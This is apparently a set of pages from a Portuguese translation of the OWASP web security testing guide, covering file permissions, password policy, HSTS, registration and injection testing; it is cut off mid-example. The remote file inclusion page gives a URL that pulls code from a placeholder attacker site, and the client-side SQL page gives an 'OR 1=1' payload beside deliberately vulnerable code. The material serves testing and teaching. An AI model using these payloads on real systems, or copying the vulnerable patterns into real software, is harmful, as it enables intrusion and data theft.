/4-Testes-Seguranca-Web-Apps/02-Testes-de-Configuracao-e-Gerenciamento-de-Implementacao/09-Testar-Permissao-de-Arquivo.md: -------------------------------------------------------------------------------- 1 | # Testar Permissão de Arquivo 2 | 3 | |ID | 4 | |------------| 5 | |WSTG-CONF-09| 6 | 7 | ## Resumo 8 | 9 | Quando um recurso recebe uma configuração de permissões que proporciona acesso a um grupo mais amplo de atores do que o necessário, isso pode levar à exposição de informações sensíveis ou à modificação desse recurso por partes não intencionadas. Isso é especialmente perigoso quando o recurso está relacionado à configuração, execução ou dados sensíveis do usuário. 10 | 11 | Um exemplo claro é um arquivo de execução que é executável por usuários não autorizados. Outro exemplo é quando as informações da conta ou um valor de token para acessar uma API - cada vez mais visto em serviços web modernos ou microsserviços - são armazenados em um arquivo de configuração cujas permissões estão definidas como leitura global a partir da instalação por padrão. Tais dados sensíveis podem ser expostos por atores maliciosos internos ao host ou por um atacante remoto que comprometeu o serviço com outras vulnerabilidades, mas obteve apenas uma permissão de usuário comum. 12 | 13 | ## Objetivos do Teste 14 | 15 | - Revisar e identificar quaisquer permissões de arquivo incorretas. 16 | 17 | ## Como Testar 18 | 19 | No Linux, use o comando `ls` para verificar as permissões do arquivo. Alternativamente, `namei` também pode ser usado para listar recursivamente as permissões do arquivo. 20 | 21 | ```bash 22 | $ namei -l /CaminhoParaVerificar/ 23 | ``` 24 | 25 | Os arquivos e diretórios que exigem teste de permissão de arquivo incluem, mas não estão limitados a: 26 | 27 | - Arquivos/diretórios da web 28 | - Arquivos/diretórios de configuração 29 | - Arquivos/diretórios sensíveis (dados criptografados, senha, chave) 30 | - Arquivos/diretórios de logs (logs de segurança, logs de operações, logs de administração) 31 | - Executáveis (scripts, EXE, JAR, class, PHP, ASP) 32 | - Arquivos/diretórios de banco de dados 33 | - Arquivos/diretórios temporários 34 | - Arquivos/diretórios de upload 35 | 36 | ## Remediação 37 | 38 | Defina as permissões dos arquivos e diretórios adequadamente para que usuários não autorizados não possam acessar recursos críticos desnecessariamente. 39 | 40 | ## Ferramentas 41 | 42 | - [Windows AccessEnum](https://technet.microsoft.com/en-us/sysinternals/accessenum) 43 | - [Windows AccessChk](https://technet.microsoft.com/en-us/sysinternals/accesschk) 44 | - [Linux namei](https://linux.die.net/man/1/namei) 45 | 46 | ## Referências 47 | 48 | - [CWE-732: Atribuição de Permissão Incorreta para Recurso Crítico](https://cwe.mitre.org/data/definitions/732.html) -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/07-Testes-Validacao-de-Entrada-de-Dados/11.2-Testing_for_Remote_File_Inclusion.md: -------------------------------------------------------------------------------- 1 | # Testing for Remote File Inclusion 2 | 3 | ## Summary 4 | 5 | The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation. 6 | 7 | This can lead to something as outputting the contents of the file, but depending on the severity, it can also lead to: 8 | 9 | - Code execution on the web server 10 | - Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS) 11 | - Denial of Service (DoS) 12 | - Sensitive Information Disclosure 13 | 14 | Remote File Inclusion (also known as RFI) is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others. 15 | 16 | ## How to Test 17 | 18 | Since RFI occurs when paths passed to "include" statements are not properly sanitized, in a black-box testing approach, we should look for scripts which take filenames as parameters. Consider the following PHP example: 19 | 20 | ```php 21 | $incfile = $_REQUEST["file"]; 22 | include($incfile.".php"); 23 | ``` 24 | 25 | In this example the path is extracted from the HTTP request and no input validation is done (for example, by checking the input against an allow list), so this snippet of code results vulnerable to this type of attack. Consider the following URL: 26 | 27 | `http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page` 28 | 29 | In this case the remote file is going to be included and any code contained in it is going to be run by the server. 30 | 31 | ## Remediation 32 | 33 | The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain an allow list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path. 34 | 35 | ## References 36 | 37 | - ["Remote File Inclusion"](http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion) 38 | - [Wikipedia: "Remote File Inclusion"](https://en.wikipedia.org/wiki/Remote_File_Inclusion) 39 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/04-Testes-de-Autenticacao/05-Testando-Dicas-de-Recuperação-de-Senhas-Vulneráveis.md: -------------------------------------------------------------------------------- 1 | # Testando Dicas de Recuperação de Senhas Vulneráveis 2 | 3 | |ID | 4 | |------------| 5 | |WSTG-ATHN-05| 6 | 7 | ## Resumo 8 | 9 | Credenciais são a tecnologia de autenticação mais amplamente utilizada. Devido ao amplo uso de pares de nome de usuário e senha, os usuários não conseguem mais gerenciar adequadamente suas credenciais em várias aplicações usadas. 10 | 11 | Para ajudar os usuários com suas credenciais, surgiram várias tecnologias: 12 | 13 | - Aplicações fornecem uma funcionalidade de *lembrar-me* que permite que o usuário permaneça autenticado por longos períodos de tempo, sem pedir novamente as credenciais do usuário. 14 | - Gerenciadores de senhas - incluindo gerenciadores de senhas de navegadores - que permitem ao usuário armazenar suas credenciais de maneira segura e depois injetá-las em formulários de usuário sem qualquer intervenção do usuário. 15 | 16 | ## Objetivos do Teste 17 | 18 | - Validar que a sessão gerada é gerenciada de forma segura e não coloca as credenciais do usuário em perigo. 19 | 20 | ## Como Testar 21 | 22 | Como esses métodos proporcionam uma melhor experiência do usuário e permitem que o usuário esqueça completamente suas credenciais, eles aumentam a superfície de ataque. Algumas aplicações: 23 | 24 | - Armazenam as credenciais de maneira codificada nos mecanismos de armazenamento do navegador, o que pode ser verificado seguindo o [cenário de teste de armazenamento na web](../11-Client-side_Testing/12-Testing_Browser_Storage.md) e passando pelos cenários de [análise de sessão](../06-Session_Management_Testing/01-Testing_for_Session_Management_Schema.md#session-analysis). As credenciais não devem ser armazenadas de forma alguma no lado do cliente e devem ser substituídas por tokens gerados no lado do servidor. 25 | - Injetam automaticamente as credenciais do usuário que podem ser abusadas por: 26 | - Ataques de [ClickJacking](../11-Client-side_Testing/09-Testing_for_Clickjacking.md). 27 | - Ataques [CSRF](../06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.md). 28 | - Tokens devem ser analisados em termos de tempo de vida do token, onde alguns tokens nunca expiram e colocam os usuários em perigo se esses tokens forem roubados. Certifique-se de seguir o cenário de teste [timeout da sessão](../06-Session_Management_Testing/07-Testing_Session_Timeout.md). 29 | 30 | ## Remediação 31 | 32 | - Siga as boas práticas de [gerenciamento de sessão](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html). 33 | - Garanta que nenhuma credencial seja armazenada em texto claro ou seja facilmente recuperável em formas codificadas ou criptografadas nos mecanismos de armazenamento do navegador; elas devem ser armazenadas no lado do servidor e seguir boas práticas de [armazenamento de senha](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html). -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/04-Testes-de-Autenticacao/07-Testando-de-Politica-de-Senha-Fraca.md: -------------------------------------------------------------------------------- 1 | # Testando Política de Senha Fraca 2 | 3 | |ID | 4 | |------------| 5 | |WSTG-ATHN-07| 6 | 7 | ## Resumo 8 | 9 | O mecanismo de autenticação mais prevalente e mais facilmente administrado é uma senha estática. A senha representa as chaves do reino, mas muitas vezes é subvertida pelos usuários em nome da usabilidade. Em cada um dos recentes hacks de alto perfil que revelaram credenciais de usuários, é lamentavel saber que as senhas mais comuns ainda sejam: `123456`, `password` e `qwerty`. 10 | 11 | ## Objetivos do Teste 12 | 13 | - Determinar a resistência da aplicação contra tentativas de adivinhação de senha por força bruta, usando dicionários de senhas disponíveis, avaliando os requisitos de comprimento, complexidade, reutilização e envelhecimento de senhas. 14 | 15 | ## Como Testar 16 | 17 | 1. Quais caracteres são permitidos e proibidos para uso em uma senha? É exigido que o usuário use caracteres de conjuntos de caracteres diferentes, como letras minúsculas e maiúsculas, dígitos e símbolos especiais? 18 | 2. Com que frequência um usuário pode alterar sua senha? Quão rapidamente um usuário pode alterar sua senha após uma alteração anterior? Os usuários podem ignorar os requisitos de histórico de senha alterando sua senha 5 vezes seguidas, para que, após a última alteração de senha, tenham configurado novamente sua senha inicial. 19 | 3. Quando um usuário deve alterar sua senha? 20 | - Tanto o [NIST](https://pages.nist.gov/800-63-3/sp800-63b.html#memsecretver) quanto o [NCSC](https://www.ncsc.gov.uk/collection/passwords/updating-your-approach#PasswordGuidance:UpdatingYourApproach-Don'tenforceregularpasswordexpiry) recomendam **não** forçar expiração regular de senha, embora isso possa ser exigido por padrões como o PCI DSS. 21 | 4. Com que frequência um usuário pode reutilizar uma senha? A aplicação mantém um histórico das 8 senhas anteriormente usadas pelo usuário? 22 | 5. Quão diferente deve ser a próxima senha em relação à última senha? 23 | 6. O usuário é impedido de usar seu nome de usuário ou outras informações da conta (como primeiro ou último nome) na senha? 24 | 7. Quais são os comprimentos mínimo e máximo de senha que podem ser definidos, e eles são apropriados para a sensibilidade da conta e da aplicação? 25 | 8. É possível definir senhas comuns, como `Password1` ou `123456`? 26 | 27 | ## Remediação 28 | 29 | Para mitigar o risco de senhas facilmente adivinháveis facilitando o acesso não autorizado, existem duas soluções: introduzir controles de autenticação adicionais (ou seja, autenticação de dois fatores) ou introduzir uma política de senha forte. A solução mais simples e mais barata é a introdução de uma política de senha forte que garanta comprimento, complexidade, reutilização e envelhecimento da senha; embora idealmente ambas devam ser implementadas. 30 | 31 | ## Referências 32 | 33 | - [Ataques de Força Bruta](https://owasp.org/www-community/attacks/Brute_force_attack) -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/07-Testes-Validacao-de-Entrada-de-Dados/05.8-Testing_for_Client-side.md: -------------------------------------------------------------------------------- 1 | # Testing for Client-side 2 | 3 | ## Summary 4 | 5 | Client-side SQL injection occurs when an application implements the [Web SQL Database](https://www.w3.org/TR/webdatabase/) technology and doesn't properly validate the input nor parametrize its query variables. This database is manipulated by using JavaScript (JS) API calls, such as `openDatabase()`, which creates or opens an existing database. 6 | 7 | ## Test Objectives 8 | 9 | The following test scenario will validate that proper input validation is conducted. If the implementation is vulnerable, the attacker can read, modify, or delete information stored within the database. 10 | 11 | ## How to Test 12 | 13 | ### Identify the Usage of Web SQL DB 14 | 15 | If the tested application implements the Web SQL DB, the following three calls will be used in the client-side core: 16 | 17 | - `openDatabase()` 18 | - `transaction()` 19 | - `executeSQL()` 20 | 21 | The code below shows an example of the APIs' implementation: 22 | 23 | ```javascript 24 | var db = openDatabase(shortName, version, displayName, maxSize); 25 | 26 | db.transaction(function(transaction) { 27 | transaction.executeSql('INSERT INTO LOGS (time, id, log) VALUES (?, ?, ?)', [dateTime, id, log]); 28 | }); 29 | ``` 30 | 31 | ### Web SQL DB Injection 32 | 33 | After confirming the usage of `executeSQL()`, the attacker is ready to test and validate the security of its implementation. 34 | 35 | The Web SQL DB's implementation is based on [SQLite's syntax](https://www.sqlite.org/lang.html). 36 | 37 | #### Bypassing Conditions 38 | 39 | The following example shows how this could be exploited on the client-side: 40 | 41 | ```javascript 42 | // URL example: https://example.com/user#15 43 | var userId = document.location.hash.substring(1,); // Grabs the ID without the hash -> 15 44 | 45 | db.transaction(function(transaction){ 46 | transaction.executeSQL('SELECT * FROM users WHERE user = ' + userId); 47 | }); 48 | ``` 49 | 50 | To return information for all the users, instead of only the user corresponding to the attacker, the following could be used: `15 OR 1=1` in the URL fragment. 51 | 52 | For additional SQL Injection payloads, go to the [Testing for SQL Injection](05-Testing_for_SQL_Injection.md) scenario. 53 | 54 | ## Remediation 55 | 56 | Follow the same remediation from the [Testing for SQL Injection's Remediation Section](05-Testing_for_SQL_Injection.md#remediation). 57 | 58 | ## References 59 | 60 | - [W3C Web SQL Database](https://www.w3.org/TR/webdatabase/) 61 | - [Apple's JavaScript Database Tutorial](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/SafariJSDatabaseGuide/UsingtheJavascriptDatabase/UsingtheJavascriptDatabase.html) 62 | - [Tutorialspoint HTML5 Web SQL Database](https://www.tutorialspoint.com/html5/html5_web_sql.htm) 63 | - [Portswigger's Client-Side SQL Injection](https://portswigger.net/web-security/dom-based/client-side-sql-injection) 64 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/03-Testes-Gerenciamento-de-Identidade/02-Testar-Processo-de-Registro-de-Usuario.md: -------------------------------------------------------------------------------- 1 | # Testar Processo de Registro de Usuario 2 | 3 | |ID | 4 | |------------| 5 | |WSTG-IDNT-02| 6 | 7 | ## Resumo 8 | 9 | Alguns sites oferecem um processo de registro de usuário que automatiza (ou semi-automatiza) o provisionamento de acesso ao sistema para os usuários. Os requisitos de identidade para acesso variam desde identificação positiva até nenhum, dependendo dos requisitos de segurança do sistema. Muitos aplicativos públicos automatizam completamente o processo de registro e provisionamento porque o tamanho da base de usuários torna impossível gerenciar manualmente. No entanto, muitos aplicativos corporativos provisionam usuários manualmente, então este caso de teste pode não ser aplicável. 10 | 11 | ## Objetivos do Teste 12 | 13 | - Verificar se os requisitos de identidade para o registro de usuários estão alinhados com os requisitos de negócios e segurança. 14 | - Validar o processo de registro. 15 | 16 | ## Como Testar 17 | 18 | Verifique se os requisitos de identidade para o registro de usuários estão alinhados com os requisitos de negócios e segurança: 19 | 20 | 1. Qualquer pessoa pode se registrar para obter acesso? 21 | 2. Os registros são revisados por um humano antes do provisionamento, ou são concedidos automaticamente se os critérios forem atendidos? 22 | 3. A mesma pessoa ou identidade pode se registrar várias vezes? 23 | 4. Os usuários podem se registrar para funções ou permissões diferentes? 24 | 5. Que comprovação de identidade é necessária para que um registro seja bem-sucedido? 25 | 6. As identidades registradas são verificadas? 26 | 27 | Valide o processo de registro: 28 | 29 | 1. As informações de identidade podem ser facilmente forjadas ou falsificadas? 30 | 2. A troca de informações de identidade pode ser manipulada durante o registro? 31 | 32 | ### Exemplo 33 | 34 | No exemplo do WordPress abaixo, o único requisito de identificação é um endereço de e-mail acessível ao registrante. 35 | 36 | \ 37 | *Figura 4.3.2-1: Página de Registro do WordPress* 38 | 39 | Em contraste, no exemplo do Google abaixo, os requisitos de identificação incluem nome, data de nascimento, país, número de telefone celular, endereço de e-mail e resposta de CAPTCHA. Embora apenas dois destes possam ser verificados (endereço de e-mail e número de celular), os requisitos de identificação são mais rigorosos do que os do WordPress. 40 | 41 | \ 42 | *Figura 4.3.2-2: Página de Registro do Google* 43 | 44 | ## Remediação 45 | 46 | Implemente requisitos de identificação e verificação que correspondam aos requisitos de segurança das informações que as credenciais protegem. 47 | 48 | ## Ferramentas 49 | 50 | Um proxy HTTP pode ser uma ferramenta útil para testar esse controle. 51 | 52 | ## Referências 53 | 54 | [User Registration Design](https://mashable.com/2011/06/09/user-registration-design/) -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/02-Testes-de-Configuracao-e-Gerenciamento-de-Implementacao/07-Testar-Seguranca-de-Transporte-Estrito-HTTP.md: -------------------------------------------------------------------------------- 1 | # Testar Segurança de Transporte Estrito HTTP 2 | 3 | |ID | 4 | |------------| 5 | |WSTG-CONF-07| 6 | 7 | ## Resumo 8 | 9 | A funcionalidade HTTP Strict Transport Security (HSTS) permite que uma aplicação web informe ao navegador, por meio do uso de um cabeçalho de resposta especial, que nunca deve estabelecer uma conexão com os servidores de domínio especificados usando HTTP não criptografado. Em vez disso, ele deve automaticamente estabelecer todas as solicitações de conexão para acessar o site por meio do HTTPS. Além disso, ele impede que os usuários anulem erros de certificado. 10 | 11 | Considerando a importância dessa medida de segurança, é prudente verificar se o site está usando esse cabeçalho HTTP para garantir que todos os dados trafeguem criptografados entre o navegador da web e o servidor. 12 | 13 | O cabeçalho HTTP strict transport security usa dois diretivas: 14 | 15 | - `max-age`: para indicar o número de segundos que o navegador deve converter automaticamente todas as solicitações HTTP para HTTPS. 16 | - `includeSubDomains`: para indicar que todos os subdomínios relacionados devem usar HTTPS. 17 | - `preload` (não oficial): para indicar que o(s) domínio(s) está(ão) na lista de pré-carregamento(s) e que os navegadores nunca devem se conectar sem HTTPS. 18 | - Isso é suportado por todos os principais navegadores, mas não faz parte oficial da especificação. (Veja [hstspreload.org](https://hstspreload.org/) para mais informações.) 19 | 20 | Aqui está um exemplo de implementação do cabeçalho HSTS: 21 | 22 | `Strict-Transport-Security: max-age=31536000; includeSubDomains` 23 | 24 | O uso deste cabeçalho por aplicações web deve ser verificado para verificar se os seguintes problemas de segurança podem ser produzidos: 25 | 26 | - Atacantes que capturam o tráfego de rede e acessam as informações transferidas por meio de um canal não criptografado. 27 | - Atacantes explorando um ataque de manipulador no meio devido ao problema de aceitar certificados que não são confiáveis. 28 | - Usuários que inserem erroneamente um endereço no navegador colocando HTTP em vez de HTTPS, ou usuários que clicam em um link em uma aplicação web que erroneamente indicou o uso do protocolo HTTP. 29 | 30 | ## Objetivos do Teste 31 | 32 | - Revisar o cabeçalho HSTS e sua validade. 33 | 34 | ## Como Testar 35 | 36 | A presença do cabeçalho HSTS pode ser confirmada examinando a resposta do servidor por meio de um proxy de interceptação ou usando o curl da seguinte forma: 37 | 38 | ```bash 39 | $ curl -s -D- https://owasp.org | grep -i strict 40 | Strict-Transport-Security: max-age=31536000 41 | ``` 42 | 43 | ## Referências 44 | 45 | - [OWASP HTTP Strict Transport Security](https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html) 46 | - [OWASP Appsec Tutorial Series - Episode 4: Strict Transport Security](https://www.youtube.com/watch?v=zEV3HOuM_Vw) 47 | - [Especificação HSTS](https://tools.ietf.org/html/rfc6797) -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/11-Testes-a-Nivel-do-Cliente/03-Testing_for_HTML_Injection.md: -------------------------------------------------------------------------------- 1 | # Testing for HTML Injection 2 | 3 | |ID | 4 | |------------| 5 | |WSTG-CLNT-03| 6 | 7 | ## Summary 8 | 9 | HTML injection is a type of injection vulnerability that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. 10 | 11 | This vulnerability occurs when user input is not correctly sanitized and the output is not encoded. An injection allows the attacker to send a malicious HTML page to a victim. The targeted browser will not be able to distinguish (trust) legitimate parts from malicious parts of the page, and consequently will parse and execute the whole page in the victim's context. 12 | 13 | There is a wide range of methods and attributes that could be used to render HTML content. If these methods are provided with an untrusted input, then there is an high risk of HTML injection vulnerability. For example, malicious HTML code can be injected via the `innerHTML` JavaScript method, usually used to render user-inserted HTML code. If strings are not correctly sanitized, the method can enable HTML injection. A JavaScript function that can be used for this purpose is `document.write()`. 14 | 15 | The following example shows a snippet of vulnerable code that allows an unvalidated input to be used to create dynamic HTML in the page context: 16 | 17 | ```js 18 | var userposition=location.href.indexOf("user="); 19 | var user=location.href.substring(userposition+5); 20 | document.getElementById("Welcome").innerHTML=" Hello, "+user; 21 | ``` 22 | 23 | The following example shows vulnerable code using the `document.write()` function: 24 | 25 | ```js 26 | var userposition=location.href.indexOf("user="); 27 | var user=location.href.substring(userposition+5); 28 | document.write("